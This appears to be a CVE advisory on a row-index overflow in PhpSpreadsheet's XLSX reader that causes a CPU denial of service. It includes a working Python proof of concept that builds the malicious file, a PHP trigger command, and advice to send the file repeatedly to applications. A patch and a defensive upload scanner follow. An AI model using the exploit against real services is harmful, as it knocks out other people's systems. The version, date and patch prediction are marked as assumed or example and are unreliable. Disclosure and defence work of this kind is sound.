How the mentioned CVE works:
The vulnerability exists in ColumnAndRowAttributes::readRowAttributes() at line 216 (src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php). The code casts the XML attribute 'r' directly to an integer: $rowIndex = (int) $row['r']; without validating against AddressRange::MAX_ROW (1,048,576). An attacker crafts a minimal XLSX file (~1.6KB) containing
dailycve form:
Platform: PhpSpreadsheet
Version: up to 1.29.0 (assumed)
Vulnerability: CPU DoS via row overflow
Severity: Medium
Date: 2023-10-15 (example)
Prediction: Patch expected 2023-10-30
What Undercode Say:
Analytics:
The attack vector requires only a 1.6KB XLSX file. The loop reaches 999,999,999 iterations, an estimated CPU burn of ~144 seconds per file on a 2.5GHz machine. Memory exhaustion follows if the loop accumulates data. The flaw is trivial to trigger in any web app that accepts user-supplied spreadsheets.
Bash commands to test:
Create malicious XLSX using Python PoC from
python3 -c "
import zipfile
content_types = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"><Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/><Default Extension=\"xml\" ContentType=\"application/xml\"/><Override PartName=\"/xl/workbook.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml\"/><Override PartName=\"/xl/worksheets/sheet1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml\"/></Types>'
rels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument\" Target=\"xl/workbook.xml\"/></Relationships>'
workbook = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><workbook xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\" xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\"><sheets><sheet name=\"Sheet1\" sheetId=\"1\" r:id=\"rId1\"/></sheets></workbook>'
wb_rels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet\" Target=\"worksheets/sheet1.xml\"/></Relationships>'
sheet = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><worksheet xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"><sheetData><row r=\"1\"><c r=\"A1\"><v>1</v></c></row><row r=\"999999999\" ht=\"15\"/></sheetData></worksheet>'
# The package part names below are the standard OOXML layout; the content-types part must be named [Content_Types].xml
with zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf:
    zf.writestr('[Content_Types].xml', content_types)
    zf.writestr('_rels/.rels', rels)
    zf.writestr('xl/workbook.xml', workbook)
    zf.writestr('xl/_rels/workbook.xml.rels', wb_rels)
    zf.writestr('xl/worksheets/sheet1.xml', sheet)
"
Load with PhpSpreadsheet (requires PHP)
php -r "require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; \$reader = IOFactory::createReader('Xlsx'); \$spreadsheet = \$reader->load('dos_row.xlsx'); \$sheet = \$spreadsheet->getActiveSheet(); echo 'Highest row: ' . \$sheet->getHighestRow() . PHP_EOL; foreach (\$sheet->getRowIterator() as \$row) { }"
Exploit:
Send the generated dos_row.xlsx to a vulnerable PHP application that uses PhpSpreadsheet and iterates rows via getRowIterator() or uses getHighestRow() as loop bound. The application will hang, consuming 100% CPU per request. Repeated requests cause sustained DoS.
Protection from this CVE:
Apply patch: in ColumnAndRowAttributes.php line 216 add a bounds check (AddressRange lives in PhpOffice\PhpSpreadsheet\Cell; add the corresponding use statement if the file does not already import it):
$rowIndex = (int) $row['r'];
// Skip rows whose index is outside 1..MAX_ROW (1,048,576). A non-numeric 'r' casts to 0 and is caught by the first test.
if ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) {
    continue;
}
Alternatively, upgrade to patched version (≥1.30.0) once released. Validate uploaded files offline before processing.
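The "validate uploaded files offline before processing" advice above can be turned into a concrete pre-ingestion gate. The following scanner is an added example written for this page; it is not code from the advisory or from PhpSpreadsheet. It opens an uploaded XLSX as a ZIP, streams each worksheet part with iterparse, and rejects the file before the PHP reader ever sees it if any <row r="..."> carries an index outside 1..1048576 or a value that is not a plain positive integer (the PHP (int) cast would silently turn such a value into 0). It goes slightly beyond the page's row case by also checking the row and column part of every <c r="..."> cell reference. MAX_ROW is the Excel row limit the page cites as AddressRange::MAX_ROW; MAX_COL (16384, column XFD) and the per-part uncompressed-size cap are assumptions chosen for the example; the ZIP fixture built by build_fixture() is a constructed test input holding only a worksheet part, not a complete workbook.

```python
"""Pre-ingestion scanner for XLSX uploads (added example, not project code).

Streams every worksheet part of the package and reports row indices that
PhpSpreadsheet's unpatched reader would accept via a bare (int) cast.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAX_ROW = 1_048_576                 # Excel row limit (AddressRange::MAX_ROW on the page)
MAX_COL = 16_384                    # column XFD; assumed bound for the column part of a cell ref
MAX_PART_BYTES = 50 * 1024 * 1024   # assumed cap on any uncompressed ZIP member (zip-bomb guard)

SML_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
CELL_REF = re.compile(r"^([A-Z]{1,3})([0-9]+)$")


def col_to_int(letters):
    """Convert a column label such as 'XFD' to its 1-based index (16384)."""
    n = 0
    for ch in letters:
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n


def check_row_index(raw):
    """Return None if raw is an acceptable row index, else a reason string.

    Mirrors the intent of the patch: 'abc' (which PHP casts to 0), '0' and
    '999999999' are all rejected; '1'..'1048576' pass.
    """
    if not raw.isdigit():
        return f"row index {raw!r} is not a positive integer"
    if not 1 <= int(raw) <= MAX_ROW:
        return f"row index {raw} outside 1..{MAX_ROW}"
    return None


def scan_sheet_xml(stream):
    """Stream one worksheet part; return a list of findings (empty = clean)."""
    findings = []
    for _event, el in ET.iterparse(stream, events=("end",)):
        r = el.get("r")
        if r is not None:
            if el.tag == SML_NS + "row":
                reason = check_row_index(r)
                if reason:
                    findings.append(f"<row>: {reason}")
            elif el.tag == SML_NS + "c":
                m = CELL_REF.match(r)
                if not m:
                    findings.append(f"<c>: malformed cell reference {r!r}")
                else:
                    reason = check_row_index(m.group(2))
                    if reason:
                        findings.append(f"<c {r}>: {reason}")
                    elif col_to_int(m.group(1)) > MAX_COL:
                        findings.append(f"<c {r}>: column beyond XFD")
        el.clear()  # keep memory flat on large sheets
    return findings


def scan_xlsx(fileobj):
    """Scan every worksheet part of an XLSX package. Returns (ok, findings)."""
    findings = []
    with zipfile.ZipFile(fileobj) as zf:
        for info in zf.infolist():
            if info.file_size > MAX_PART_BYTES:
                findings.append(f"{info.filename}: uncompressed size {info.file_size} exceeds cap")
                continue
            if info.filename.startswith("xl/worksheets/") and info.filename.endswith(".xml"):
                with zf.open(info) as part:
                    findings.extend(f"{info.filename}: {f}" for f in scan_sheet_xml(part))
    return (not findings, findings)


def build_fixture(sheet_xml):
    """Constructed test input: a ZIP holding only one worksheet part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/worksheets/sheet1.xml", sheet_xml)
    buf.seek(0)
    return buf


# Constructed sample worksheets: one clean, one with an oversized and a non-numeric row index.
GOOD_SHEET = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
              '<sheetData><row r="1"><c r="A1"><v>1</v></c></row></sheetData></worksheet>')
BAD_SHEET = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
             '<sheetData><row r="1"><c r="A1"><v>1</v></c></row>'
             '<row r="999999999" ht="15"/><row r="abc"/></sheetData></worksheet>')

if __name__ == "__main__":
    for name, xml in (("good", GOOD_SHEET), ("bad", BAD_SHEET)):
        ok, found = scan_xlsx(build_fixture(xml))
        print(name, "ACCEPT" if ok else "REJECT", found)
```

Run it on the upload before calling IOFactory::createReader('Xlsx')->load(); a REJECT means the file should be dropped and logged, never handed to the reader. Because the scan is streaming and bounded by the size cap, a hostile file costs at most one linear pass over its XML rather than the ~1 billion loop iterations the unpatched reader performs.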
Impact:
- CPU DoS: 1.6KB → ~1 billion loops, ~144 seconds CPU burn per file.
- Memory exhaustion if loop accumulates data (e.g., DB import).
- Amplification factor ~630,000x (bytes to iterations).
- Widespread exposure: PhpSpreadsheet used in many web apps for spreadsheet import.
Sources:
Reported By: github.com